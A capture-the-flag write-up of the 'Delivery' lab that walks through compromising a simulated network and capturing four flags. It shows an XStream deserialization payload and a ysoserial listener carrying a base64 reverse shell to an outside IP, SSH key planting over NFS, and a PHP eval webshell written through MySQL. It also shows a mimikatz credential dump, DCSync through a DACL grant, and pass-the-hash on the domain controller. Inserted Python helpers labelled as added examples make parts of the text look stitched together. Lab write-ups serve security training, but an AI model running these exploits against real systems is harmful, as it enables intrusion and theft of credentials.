春秋云镜-Delivery

Penetration testing

flag01

Test the security of the Delivery web application exposed on the public internet and try to gain the ability to execute arbitrary commands on that server.

Run a quick fscan against the public IP:

```text
fscan -h 39.99.142.217

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.3
start infoscan
39.99.142.217:80 open
39.99.142.217:22 open
39.99.142.217:21 open
39.99.142.217:8080 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle http://39.99.142.217 code:200 len:10918 title:Apache2 Ubuntu Default Page: It works
[+] ftp 39.99.142.217:21:anonymous
    [->]1.txt
    [->]pom.xml
[*] WebTitle http://39.99.142.217:8080 code:200 len:3655 title:公司发货单
```

FTP allows anonymous login (two files are exposed: 1.txt and pom.xml), and there is a second web application on port 8080 titled 公司发货单 (company delivery note).

Download the files from the FTP share. pom.xml is the interesting one:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.7.2</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>
    <groupId>com.example</groupId>
    <artifactId>ezjava</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>ezjava</name>
    <description>ezjava</description>
    <properties>
        <java.version>1.8</java.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-thymeleaf</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>

        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.16</version>
        </dependency>

        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.2.1</version>
        </dependency>
    </dependencies>

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>

</project>
```

The project depends on XStream 1.4.16 and commons-collections 3.2.1. XStream 1.4.16 is still exposed to the batch of unmarshalling gadget chains that were fixed in 1.4.18, and commons-collections 3.2.1 supplies the ysoserial CommonsCollections gadgets. The `/just_sumbit_it` endpoint of the delivery-note app accepts `application/xml`, so we reproduce the XStream attack from the reference articles listed at the end: the XML makes the server deserialize a `RegistryImpl_Stub` pointing at our host, which turns the application into a JRMP client that fetches and deserializes whatever our listener returns.

First start a malicious JRMP listener with ysoserial. The CommonsCollections6 payload runs a base64-encoded reverse shell (`bash -i >& /dev/tcp/156.238.233.55/2333 0>&1`):

```bash
java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTYuMjM4LjIzMy41NS8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}"
```

Then start the reverse-shell listener:

```bash
nc -lvvp 2333
```

Send the request. When the PriorityQueue is rebuilt its two RdnEntry elements get compared, the XString comparison calls toString() on the Packet, and that walks through the SAAJ message into the KeyStoreIterator and its lazy BindingEnumeration, whose embedded RegistryImpl_Stub connects to our JRMP listener on 1099:

```http
POST /just_sumbit_it HTTP/1.1
Host: 39.99.142.217:8080
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/xml

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
    </default>
    <int>3</int>
    <javax.naming.ldap.Rdn_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.org.apache.xpath.internal.objects.XString'>
        <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
      </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
    <javax.naming.ldap.Rdn_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
        <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
          <parsedMessage>true</parsedMessage>
          <soapVersion>SOAP_11</soapVersion>
          <bodyParts/>
          <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
            <attachmentsInitialized>false</attachmentsInitialized>
            <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
              <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                  <names>
                    <string>aa</string>
                    <string>aa</string>
                  </names>
                  <ctx>
                    <environment/>
                    <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                      <java.rmi.server.RemoteObject>
                        <string>UnicastRef</string>
                        <string>156.238.233.55</string>
                        <int>1099</int>
                        <long>0</long>
                        <int>0</int>
                        <long>0</long>
                        <short>0</short>
                        <boolean>false</boolean>
                      </java.rmi.server.RemoteObject>
                    </registry>
                    <host>156.238.233.55</host>
                    <port>1099</port>
                  </ctx>
                </candidates>
              </aliases>
            </nullIter>
          </sm>
        </message>
      </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>
```

The shell comes back as root straight away, which makes the rest easy.

```bash
cat /r*/f*/f*
```

flag01: flag{d372ea01-40af-460a-80c9-753780de77e0}

flag02

To share files across machines and operating systems, the administrator deployed NFS on the internal network, but that decision exposed the server to risk. Your task is to take control of that server to assess its security.

We already have root on the internet-facing host, so first bring it online in vshell (which also gives us a SOCKS proxy into the internal network for proxychains), then scan the internal subnet from that host:

```text
./fscan -h 172.22.13.14/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.13.14    is alive
(icmp) Target 172.22.13.6     is alive
(icmp) Target 172.22.13.57    is alive
(icmp) Target 172.22.13.28    is alive
[*] Icmp alive hosts len is: 4
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.28:3306 open
172.22.13.28:445 open
172.22.13.6:445 open
172.22.13.28:139 open
172.22.13.6:139 open
172.22.13.28:135 open
172.22.13.6:135 open
172.22.13.28:80 open
172.22.13.57:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.14:22 open
172.22.13.6:88 open
172.22.13.14:21 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo
[*]172.22.13.6
   [->]WIN-DC
   [->]172.22.13.6
[*] NetInfo
[*]172.22.13.28
   [->]WIN-HAUWOLAO
   [->]172.22.13.28
[*] NetBios 172.22.13.6     [+] DC:XIAORANG\WIN-DC
[*] WebTitle http://172.22.13.57       code:200 len:4833   title:Welcome to CentOS
[+] ftp 172.22.13.14:21:anonymous
   [->]1.txt
   [->]pom.xml
[*] WebTitle http://172.22.13.14:8080  code:200 len:3655   title:公司发货单
[*] WebTitle http://172.22.13.14       code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] NetBios 172.22.13.28    WIN-HAUWOLAO.xiaorang.lab           Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.13.28       code:200 len:2525   title:欢迎登录OA办公平台
[*] WebTitle http://172.22.13.28:8000  code:200 len:170    title:Nothing Here.
[+] mysql 172.22.13.28:3306:root 123456
```

Quick summary of the hosts:

172.22.13.6   WIN-DC (domain controller, XIAORANG\WIN-DC)

172.22.13.14  the internet-facing host we already own

172.22.13.28  WIN-HAUWOLAO.xiaorang.lab (Windows Server 2016; OA web app on 80, MySQL root / 123456 on 3306)

172.22.13.57  CentOS (SSH and HTTP)

The hint mentions NFS, so scan the subnet for port 2049, which the default scan above did not cover:

```text
./fscan -h 172.22.13.0/24 -p 2049

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
(icmp) Target 172.22.13.14    is alive
(icmp) Target 172.22.13.6     is alive
(icmp) Target 172.22.13.28    is alive
(icmp) Target 172.22.13.57    is alive
[*] Icmp alive hosts len is: 4
[*] alive ports len is: 1
start vulscan
172.22.13.57:2049 open
```

Then list the exports. showmount is a user-space RPC client, so it does work through proxychains:

```bash
proxychains -q showmount -e 172.22.13.57
```

The export is /home/joyce. The plan was to mount it directly on the attack box, but mount does not go through proxychains: the NFS client is implemented in the kernel, and proxychains only intercepts the libc socket calls of a user-space process, so the mount never reaches the target.

Instead, SSH to the internet-facing host (which reaches 172.22.13.57 directly), install an NFS client there from offline .deb packages (nfs-common offline installer for ubuntu 20.04.5 LTS · GitHub), mount the export on that host, and write an SSH public key for the joyce user.

run.sh

```bash
wget http://archive.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.3.4-2.5ubuntu3_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libn/libnfsidmap/libnfsidmap2_0.25-5.1ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc3_1.2.5-1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/r/rpcbind/rpcbind_1.2.5-8_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/k/keyutils/keyutils_1.6-6ubuntu1_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/main/libt/libtirpc/libtirpc-common_1.2.5-1_all.deb

# Transfer the debs to the target machine and install them in this order
sudo dpkg -i libnfsidmap2_0.25-5.1ubuntu1_amd64.deb && \
sudo dpkg -i libtirpc-common_1.2.5-1_all.deb && \
sudo dpkg -i libtirpc3_1.2.5-1_amd64.deb && \
sudo dpkg -i rpcbind_1.2.5-8_amd64.deb && \
sudo dpkg -i keyutils_1.6-6ubuntu1_amd64.deb && \
sudo dpkg -i nfs-common_1.3.4-2.5ubuntu3_amd64.deb
```

Once installed, create a mount point and mount the export onto it:

```bash
mkdir -p tmp && mount -t nfs 172.22.13.57:/home/joyce tmp
```

df -h confirms the mount succeeded.

Then write a public key into tmp/.ssh/authorized_keys through the mount and SSH in as joyce.
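The key-planting step with the ownership caveat handled, as an added example (not the writeup's code). With the default root_squash export option the NFS server maps the client's root to nobody, so a key written as root either fails or ends up owned by nobody and is refused by sshd's StrictModes; writing as the uid/gid that owns the home works under both root_squash and no_root_squash. The helper therefore switches its effective ids to the directory owner before touching .ssh/ (that switch needs root on the client, which the writeup had on the internet-facing host). The mount path, the key and the scratch directory used by demo() are assumptions.

```python
"""Plant an SSH public key in a home directory reachable through an NFS mount.

Added example, not from the writeup. Writes as the uid/gid that owns the home
so the result is valid regardless of the export's root_squash setting.
"""
import os
import stat
import tempfile


def plant_key(home, pubkey):
    """Append pubkey to <home>/.ssh/authorized_keys with modes sshd accepts.
    Returns the authorized_keys path."""
    st = os.stat(home)
    saved_uid, saved_gid = os.geteuid(), os.getegid()
    switched = saved_uid != st.st_uid
    if switched:  # only root may assume another uid; PermissionError otherwise
        os.setegid(st.st_gid)
        os.seteuid(st.st_uid)
    try:
        ssh_dir = os.path.join(home, ".ssh")
        os.makedirs(ssh_dir, mode=0o700, exist_ok=True)
        os.chmod(ssh_dir, 0o700)          # StrictModes rejects group/world-writable dirs
        ak = os.path.join(ssh_dir, "authorized_keys")
        line = pubkey.strip() + "\n"
        existing = open(ak).read() if os.path.exists(ak) else ""
        if line not in existing:          # idempotent: re-running does not duplicate the key
            with open(ak, "a") as fh:
                fh.write(line)
        os.chmod(ak, 0o600)
        return ak
    finally:
        if switched:                      # back to root (saved set-uid is still 0)
            os.seteuid(saved_uid)
            os.setegid(saved_gid)


def key_layout(home):
    """(owner uid of authorized_keys, .ssh mode, authorized_keys mode, key count)
    so the result can be checked before trying to log in."""
    ssh_dir = os.path.join(home, ".ssh")
    ak = os.path.join(ssh_dir, "authorized_keys")
    with open(ak) as fh:
        count = sum(1 for l in fh if l.strip())
    return (os.stat(ak).st_uid,
            stat.S_IMODE(os.stat(ssh_dir).st_mode),
            stat.S_IMODE(os.stat(ak).st_mode),
            count)


def demo():
    """Exercise plant_key against a scratch directory we own (stands in for the
    mounted /home/joyce); planting twice must leave exactly one key."""
    home = tempfile.mkdtemp(prefix="joyce-")
    key = "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPlaceholderKeyForTheExample root@attacker"  # constructed
    plant_key(home, key)
    plant_key(home, key)
    return key_layout(home)


if __name__ == "__main__":
    # On the internet-facing host, after: mkdir -p tmp && mount -t nfs 172.22.13.57:/home/joyce tmp
    #   plant_key("tmp", open("/root/.ssh/id_ed25519.pub").read())
    print(demo())
```

Check the owner with `ls -ln tmp` first: if it is not the uid you can assume, create a local user with that uid (`useradd -u <uid>`) and run the helper as that user instead.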

发现根目录放了一个域账号的密码:xiaorang.lab/zhangwen\QT62f3gBhK1

查看suid发现存在pkexec和ftp命令

image-20250307203634100

直接试一下Pwnkit,失败了

image-20250307203714414

然后再看看ftpftp | GTFOBins

可以利用这个文件上传,直接把flag01传上去

Start a writable FTP server on the internet-facing host (pyftpdlib; user test, password test, -w enables uploads):

```bash
python3 -m pyftpdlib -p 8888 -u test -P test -w
```

On 172.22.13.57:

```bash
cd /
ftp 172.22.13.14 8888
put flag02.txt
```

The upload succeeds; read the flag from the FTP server's working directory on the internet-facing host.

flag02: flag{341e34f5-8d96-46c0-9221-3a4260487176}

flag03

Try to gain access to the internal server running the OA system and retrieve the confidential file stored on it.

fscan already found the MySQL weak credential root / 123456 on 172.22.13.28, so connect to it first.

Check whether file writes are allowed:

```sql
show variables like "secure_file_priv";
```

An empty value means SELECT ... INTO OUTFILE may write anywhere the MySQL service account can (NULL would disable it entirely, and a directory value restricts writes to that directory).

Look up the plugin directory to learn where MySQL is installed:

```sql
show variables like "%plugin%";
```

plugin_dir sits under C:\phpstudy_pro\, a phpStudy install, whose default web root is C:\phpstudy_pro\www.

Write a webshell into the web root. Backslashes are doubled inside the MySQL string literal, and INTO OUTFILE refuses to overwrite an existing file, so pick a name that does not exist yet:

```sql
select "<?php eval($_POST[1]);phpinfo();?>" into outfile "C:\\phpstudy_pro\\www\\shell.php";
```
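The decision logic behind those three queries, as an added example (not from the writeup): interpret the secure_file_priv value, derive the install root from plugin_dir, and build the INTO OUTFILE statement with correct literal escaping. The secure_file_priv semantics come from the MySQL reference manual; the plugin_dir value below is a constructed stand-in for the screenshot, and install_root's marker is an assumption specific to phpStudy.

```python
"""Evaluate secure_file_priv and build a SELECT ... INTO OUTFILE statement.

Added example, not from the writeup. secure_file_priv: NULL disables
import/export entirely, '' allows any path the server process can write, a
directory value confines writes to that directory.
"""
import ntpath
import posixpath


def outfile_allowed(secure_file_priv, target, windows=True):
    """secure_file_priv as returned by SHOW VARIABLES (None for NULL). Both paths
    are normalised first so '..' segments cannot escape the allowed directory."""
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    p = ntpath if windows else posixpath
    base = p.normcase(p.normpath(secure_file_priv)).rstrip(p.sep) + p.sep
    return p.normcase(p.normpath(target)).startswith(base)


def install_root(plugin_dir, marker="phpstudy_pro"):
    """Cut plugin_dir down to the directory named by marker, e.g.
    C:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\ -> C:\\phpstudy_pro.
    Returns None when the marker is absent (not a phpStudy box)."""
    parts = plugin_dir.replace("/", "\\").rstrip("\\").split("\\")
    lowered = [x.lower() for x in parts]
    if marker.lower() not in lowered:
        return None
    return "\\".join(parts[: lowered.index(marker.lower()) + 1])


def mysql_literal(s):
    """Double-quoted MySQL string literal: backslash and the quote itself are
    escaped, which is why the path in the writeup carries doubled backslashes."""
    return '"' + s.replace("\\", "\\\\").replace('"', '\\"') + '"'


def outfile_statement(payload, path):
    return f"SELECT {mysql_literal(payload)} INTO OUTFILE {mysql_literal(path)};"


if __name__ == "__main__":
    priv = ""                                                      # what SHOW VARIABLES returned
    plugin = "C:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\"  # constructed stand-in
    root = install_root(plugin)
    shell = ntpath.join(root, "www", "shell.php")
    if outfile_allowed(priv, shell):
        print(outfile_statement("<?php eval($_POST[1]);?>", shell))
    else:
        print("secure_file_priv blocks", shell)
```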


flag03: flag{55908de1-6d6c-4743-ba6c-e2cdebf0facf}

flag04

Because of a domain administrator's misconfiguration, one user in the domain holds a dangerous DACL. Find that user and assess the potential impact of the misconfiguration.

The webshell runs as SYSTEM, so upload mimikatz and dump the logon credentials from LSASS:

```text
C:\Users\Administrator\flag> mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit"

  .#####.   mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # sekurlsa::logonpasswords full

Authentication Id : 0 ; 87266 (00000000:000154e2)
Session           : Service from 0
User Name         : chenglei
Domain            : XIAORANG
Logon Server      : WIN-DC
Logon Time        : 2025/3/7 19:35:56
SID               : S-1-5-21-3269458654-3569381900-10559451-1105
        msv :
         [00000003] Primary
         * Username   : chenglei
         * Domain     : XIAORANG
         * NTLM       : 0c00801c30594a1b8eaa889d237c5382
         * SHA1       : e8848f8a454e08957ec9814b9709129b7101fad7
         * DPAPI      : 89b179dc738db098372c365602b7b0f4
        tspkg :
        wdigest :
         * Username   : chenglei
         * Domain     : XIAORANG
         * Password   : (null)
        kerberos :
         * Username   : chenglei
         * Domain     : XIAORANG.LAB
         * Password   : Xt61f3LBhg1
        ssp :
        credman :

Authentication Id : 0 ; 87120 (00000000:00015450)
Session           : Service from 0
User Name         : chenglei
Domain            : XIAORANG
Logon Server      : WIN-DC
Logon Time        : 2025/3/7 19:35:56
SID               : S-1-5-21-3269458654-3569381900-10559451-1105
        msv :
         [00000003] Primary
         * Username   : chenglei
         * Domain     : XIAORANG
         * NTLM       : 0c00801c30594a1b8eaa889d237c5382
         * SHA1       : e8848f8a454e08957ec9814b9709129b7101fad7
         * DPAPI      : 89b179dc738db098372c365602b7b0f4
        tspkg :
        wdigest :
         * Username   : chenglei
         * Domain     : XIAORANG
         * Password   : (null)
        kerberos :
         * Username   : chenglei
         * Domain     : XIAORANG.LAB
         * Password   : Xt61f3LBhg1
        ssp :
        credman :

Authentication Id : 0 ; 52745 (00000000:0000ce09)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/7 19:35:54
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username   : WIN-HAUWOLAO$
         * Domain     : XIAORANG
         * NTLM       : 442582833a4e306d5e179e7df29b091e
         * SHA1       : c1d26438993aecdb4e077fdef40f8c6ffc502285
        tspkg :
        wdigest :
         * Username   : WIN-HAUWOLAO$
         * Domain     : XIAORANG
         * Password   : (null)
        kerberos :
         * Username   : WIN-HAUWOLAO$
         * Domain     : xiaorang.lab
         * Password   : e5 57 a8 39 1a 9c 48 11 78 09 f4 99 c0 48 e8 42 7f e6 ba 22 a6 5a 8b a2 6c 9d 79 ef fd 66 64 70 ad b9 fc 49 31 32 9c ae c5 ba da 34 e0 8e 32 cf b2 9a 81 d9 e8 23 ed 9c f3 a3 e5 80 82 45 df 66 3e 82 26 e7 ad 88 e0 48 40 69 22 2f 23 32 d1 59 51 d9 78 98 90 4e 07 54 35 8a bd 0b 60 46 8c fa 79 f3 7a 4c 6b 66 56 4f 45 2e bd 87 de 6c e6 59 e8 3f c5 b9 e2 96 59 db d9 a8 6c b0 82 30 ae b6 f9 ea ef 34 41 42 97 b4 64 d9 69 b0 4c 82 46 9a 14 42 7b ac d7 97 4a 4f e6 e3 10 aa 0f 73 9f e7 18 9d f7 9d c7 8a c8 a8 f0 be dd 77 d0 f0 6a 3d ac 0a 90 e6 f4 6c d4 b7 6e 8d 59 e6 aa 66 cf 3d ec f1 9d e8 f8 ff 86 01 d7 d1 fc 9b 10 56 3f ee 26 b3 8a 1a b0 cc 81 68 0a 90 fe de 5b 02 2d ee 7f 90 8f 97 fa ee 03 b6 7a b1 50 c5 fe 4c c2 1f
        ssp :
        credman :

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-HAUWOLAO$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/3/7 19:35:54
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username   : WIN-HAUWOLAO$
         * Domain     : XIAORANG
         * NTLM       : 442582833a4e306d5e179e7df29b091e
         * SHA1       : c1d26438993aecdb4e077fdef40f8c6ffc502285
        tspkg :
        wdigest :
         * Username   : WIN-HAUWOLAO$
         * Domain     : XIAORANG
         * Password   : (null)
        kerberos :
         * Username   : win-hauwolao$
         * Domain     : XIAORANG.LAB
         * Password   : e5 57 a8 39 1a 9c 48 11 78 09 f4 99 c0 48 e8 42 7f e6 ba 22 a6 5a 8b a2 6c 9d 79 ef fd 66 64 70 ad b9 fc 49 31 32 9c ae c5 ba da 34 e0 8e 32 cf b2 9a 81 d9 e8 23 ed 9c f3 a3 e5 80 82 45 df 66 3e 82 26 e7 ad 88 e0 48 40 69 22 2f 23 32 d1 59 51 d9 78 98 90 4e 07 54 35 8a bd 0b 60 46 8c fa 79 f3 7a 4c 6b 66 56 4f 45 2e bd 87 de 6c e6 59 e8 3f c5 b9 e2 96 59 db d9 a8 6c b0 82 30 ae b6 f9 ea ef 34 41 42 97 b4 64 d9 69 b0 4c 82 46 9a 14 42 7b ac d7 97 4a 4f e6 e3 10 aa 0f 73 9f e7 18 9d f7 9d c7 8a c8 a8 f0 be dd 77 d0 f0 6a 3d ac 0a 90 e6 f4 6c d4 b7 6e 8d 59 e6 aa 66 cf 3d ec f1 9d e8 f8 ff 86 01 d7 d1 fc 9b 10 56 3f ee 26 b3 8a 1a b0 cc 81 68 0a 90 fe de 5b 02 2d ee 7f 90 8f 97 fa ee 03 b6 7a b1 50 c5 fe 4c c2 1f
        ssp :
        credman :

Authentication Id : 0 ; 23830 (00000000:00005d16)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2025/3/7 19:35:53
SID               :
        msv :
         [00000003] Primary
         * Username   : WIN-HAUWOLAO$
         * Domain     : XIAORANG
         * NTLM       : 442582833a4e306d5e179e7df29b091e
         * SHA1       : c1d26438993aecdb4e077fdef40f8c6ffc502285
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2025/3/7 19:35:54
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        kerberos :
         * Username   : (null)
         * Domain     : (null)
         * Password   : (null)
        ssp :
        credman :

Authentication Id : 0 ; 52782 (00000000:0000ce2e)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2025/3/7 19:35:54
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username   : WIN-HAUWOLAO$
         * Domain     : XIAORANG
         * NTLM       : b5cd3591a58e1169186bcdbfd4b6322d
         * SHA1       : 226ee6b5e527e5903988f08993a2456e3297ee1f
        tspkg :
        wdigest :
         * Username   : WIN-HAUWOLAO$
         * Domain     : XIAORANG
         * Password   : (null)
        kerberos :
         * Username   : WIN-HAUWOLAO$
         * Domain     : xiaorang.lab
         * Password   : `k+hcEDFvtzoObj=>DvzxiNqwyEn;Eu-\zFVAh>.G0u%BqQ21FskHtJlW4)3is3V;7Iu)3B00kd1##IB'LLG6wSx6TR%m;`Nfr;;Hf8O'Szfl0Z=w+^,>0jR
        ssp :
        credman :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-HAUWOLAO$
Domain            : XIAORANG
Logon Server      : (null)
Logon Time        : 2025/3/7 19:35:53
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username   : WIN-HAUWOLAO$
         * Domain     : XIAORANG
         * Password   : (null)
        kerberos :
         * Username   : win-hauwolao$
         * Domain     : XIAORANG.LAB
         * Password   : e5 57 a8 39 1a 9c 48 11 78 09 f4 99 c0 48 e8 42 7f e6 ba 22 a6 5a 8b a2 6c 9d 79 ef fd 66 64 70 ad b9 fc 49 31 32 9c ae c5 ba da 34 e0 8e 32 cf b2 9a 81 d9 e8 23 ed 9c f3 a3 e5 80 82 45 df 66 3e 82 26 e7 ad 88 e0 48 40 69 22 2f 23 32 d1 59 51 d9 78 98 90 4e 07 54 35 8a bd 0b 60 46 8c fa 79 f3 7a 4c 6b 66 56 4f 45 2e bd 87 de 6c e6 59 e8 3f c5 b9 e2 96 59 db d9 a8 6c b0 82 30 ae b6 f9 ea ef 34 41 42 97 b4 64 d9 69 b0 4c 82 46 9a 14 42 7b ac d7 97 4a 4f e6 e3 10 aa 0f 73 9f e7 18 9d f7 9d c7 8a c8 a8 f0 be dd 77 d0 f0 6a 3d ac 0a 90 e6 f4 6c d4 b7 6e 8d 59 e6 aa 66 cf 3d ec f1 9d e8 f8 ff 86 01 d7 d1 fc 9b 10 56 3f ee 26 b3 8a 1a b0 cc 81 68 0a 90 fe de 5b 02 2d ee 7f 90 8f 97 fa ee 03 b6 7a b1 50 c5 fe 4c c2 1f
        ssp :
        credman :

mimikatz(commandline) # exit
Bye!
```

One domain user stands out, with both an NTLM hash (msv provider) and a cleartext password (kerberos provider):

```text
* Username : chenglei
* Domain : XIAORANG
* NTLM : 0c00801c30594a1b8eaa889d237c5382
* SHA1 : e8848f8a454e08957ec9814b9709129b7101fad7
* DPAPI : 89b179dc738db098372c365602b7b0f4

* Username : chenglei
* Domain : XIAORANG.LAB
* Password : Xt61f3LBhg1
```

Check chenglei's domain account and group membership:

```cmd
net user chenglei /domain
```

chenglei is a member of the ACL Admin group, which means chenglei holds WriteDacl on the domain object. WriteDacl lets the holder rewrite the domain's DACL, so the attack is the same as the classic Exchange Windows Permissions abuse: grant our own account the replication rights (DCSync) and then dump every domain hash from the DC.

Grant the right with impacket's dacledit.py:

```bash
proxychains -q python3 dacledit.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -action write -rights DCSync -principal chenglei -target-dn 'DC=xiaorang,DC=lab' -dc-ip 172.22.13.6
```


Dump the domain hashes over DCSync:

```bash
proxychains -q impacket-secretsdump xiaorang.lab/chenglei:Xt61f3LBhg1@WIN-DC.xiaorang.lab -target-ip 172.22.13.6 -just-dc-ntlm -history -user-status
```


Pass the Administrator NTLM hash to the DC and read the flag (on a real engagement, remove the ACE afterwards; dacledit.py supports -action remove):

```bash
proxychains -q crackmapexec smb 172.22.13.6 -u administrator -H 6341235defdaed66fb7b682665752c9a -d xiaorang.lab -x "type Users\Administrator\flag\flag04.txt"
```


flag04: flag{33454313-e8d4-40db-8542-41222632bb89}

References

内网打靶—春秋云镜篇(5) –Delivery - 先知社区

Delivery - 春秋云境 | h0ny's blog